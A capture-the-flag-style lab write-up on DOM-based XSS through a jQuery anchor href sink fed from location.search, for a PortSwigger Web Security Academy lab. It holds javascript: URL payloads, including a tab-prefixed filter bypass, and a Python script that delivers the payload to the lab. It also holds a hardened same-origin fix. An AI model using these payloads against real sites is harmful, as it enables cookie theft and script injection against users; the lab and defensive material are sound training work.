Shubham Ranpise


XSS Lab 5

DOM-based XSS via jQuery $ selector and href attribute using location.search source


DOM XSS in jQuery anchor href attribute sink using location.search source

This lab demonstrates a DOM-based cross-site scripting (XSS) vulnerability on the Submit Feedback page. The page's script uses the jQuery $ selector function to locate the “back” anchor element and sets its href attribute straight from the returnPath query parameter, which it reads from location.search. Nothing restricts that value to a relative path or an http(s) URL, so a returnPath of the form javascript:... makes the link execute attacker-chosen JavaScript in the page's origin when the user clicks “back”. The source (location.search) is attacker-controlled because it is part of the URL the victim is lured into opening, and the sink (an anchor's href) accepts any URL scheme.

How Exploit Works

  • The returnPath query parameter is read from location.search and used by jQuery to set the href of the “back” link.
  • The value is written into the DOM without validation or encoding; the server never sees or filters it, because the page's own JavaScript reads it from the URL.
  • Setting returnPath=javascript:alert(document.cookie) turns the link into a javascript: URL, so clicking “back” runs the payload and shows the page's cookies.
  • The alert only fires when the link is followed in a browser. The lab is marked solved when alert() runs there (for example in Burp's browser), not when a script merely requests the URL.
  • This confirms a DOM-based XSS vulnerability using the jQuery anchor href sink.
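The following is an added example, not the lab's or PortSwigger's own code: a Node-runnable model of the “back” link sink described above next to a hardened version of it. It assumes a site origin of https://lab.example in place of the real lab host, and models the jQuery sink by returning the value that would be assigned to href rather than touching a DOM. It also shows why a blocklist on the string "javascript:" is not enough: the URL parser strips leading control characters and tabs/newlines before reading the scheme, so "%09javascript:..." slips past a prefix check but still executes.

```javascript
// Added example (not the lab's or PortSwigger's code): a Node-runnable model of the
// "back" link sink and a hardened version of it.
// Assumption: the site origin; the real lab lives at https://<your-lab-id>.web-security-academy.net
const SITE_ORIGIN = 'https://lab.example';

// Vulnerable: whatever is in returnPath becomes the href unchanged.
// In the lab this is the jQuery sink, roughly $(selector).attr('href', value);
// here we just return the value that would be assigned.
function vulnerableBackHref(search) {
  return new URLSearchParams(search).get('returnPath');
}

// A blocklist check that is easy to get wrong: the browser's URL parser strips
// leading C0 controls and all tabs/newlines before reading the scheme, so
// "\tjavascript:..." passes this test and still executes.
function naiveIsSafe(value) {
  return !value.toLowerCase().startsWith('javascript:');
}

// Hardened: resolve the value against the site origin with the same URL parser
// the browser uses, keep it only if it stays on this origin, and re-emit just
// the path, query and fragment so the href can never carry a scheme or host.
function safeBackHref(search, origin = SITE_ORIGIN, fallback = '/') {
  const value = new URLSearchParams(search).get('returnPath');
  if (value === null) return fallback;
  let resolved;
  try {
    resolved = new URL(value, origin);   // relative paths resolve onto origin
  } catch {
    return fallback;                      // unparsable input
  }
  // javascript:, data:, protocol-relative //evil and https://evil all fail here
  if (resolved.origin !== origin) return fallback;
  return resolved.pathname + resolved.search + resolved.hash;
}

// Constructed query strings (not captured from the lab) exercising both sinks.
const CASES = [
  '?returnPath=/post?postId=3',
  '?returnPath=javascript:alert(document.cookie)',
  '?returnPath=%09javascript:alert(1)',
  '?returnPath=//evil.example/',
  '?returnPath=https://lab.example/feedback',
  '?foo=1',
];

for (const search of CASES) {
  const raw = vulnerableBackHref(search);
  console.log(
    JSON.stringify(search).padEnd(48),
    'vulnerable ->', JSON.stringify(raw),
    '| naiveIsSafe ->', raw === null ? 'n/a' : naiveIsSafe(raw),
    '| safe ->', JSON.stringify(safeBackHref(search)),
  );
}
```

Run it with `node` to see each case side by side. The fix uses an allowlist (same-origin only, path re-emitted) rather than a blocklist of bad schemes; that is the shape of check to look for when reviewing any code that writes user input into an href, src or location.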

Usage

```cmd
python3 exploit.py https://<your-lab-id>.web-security-academy.net
```

Exploit

```python
import sys

import requests
import urllib3

# Disable SSL warnings: the lab is reached through Burp Suite's self-signed CA
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

# Route all requests through the Burp Suite proxy listener
proxies = {
    'http': 'http://127.0.0.1:8080',
    'https': 'http://127.0.0.1:8080'
}


def check_burp():
    """Check that Burp Suite is running and listening on the configured proxy."""
    try:
        requests.get("http://127.0.0.1:8080", timeout=3)
    except requests.exceptions.RequestException:
        print("[-] Burp Suite is not running. Please start it and try again.")
        sys.exit(1)


def exploit_xss(url, payload):
    """Request the feedback page with the payload in the returnPath parameter,
    then check the lab header for the solved banner.

    The payload is not reflected by the server: the page reads it from
    location.search in the browser. The request below therefore only seeds
    Burp's history with the malicious URL; open it in Burp's browser and click
    the "back" link to make the alert fire and the lab register as solved.
    """
    uri = f"/feedback?returnPath={payload}"  # the payload's characters need no URL encoding
    res = requests.get(url + uri, verify=False, proxies=proxies)
    res.raise_for_status()
    print(f"[*] Open this in Burp's browser and click 'back': {url + uri}")

    session = requests.Session()
    res = session.get(url, verify=False, proxies=proxies)
    if "Congratulations" in res.text:
        print("[+] Lab solved 🎉")
        return True
    print("[-] Lab not solved.")
    return False


def main():
    """Entry point of the script."""
    if len(sys.argv) != 2:
        print(f"Usage: python3 {sys.argv[0]} <url>")
        print(f"Example: python3 {sys.argv[0]} https://example.com")
        sys.exit(1)

    url = sys.argv[1].strip().rstrip('/')

    # Step 1: Check Burp Suite
    check_burp()

    # Step 2: Define XSS payload for the anchor href sink
    payload = 'javascript:alert(document.cookie)'

    # Step 3: Attempt exploitation
    print("[*] Attempting XSS...")
    if exploit_xss(url, payload):
        print("[+] XSS successful!")
    else:
        print("[-] XSS unsuccessful.")


if __name__ == "__main__":
    main()
```
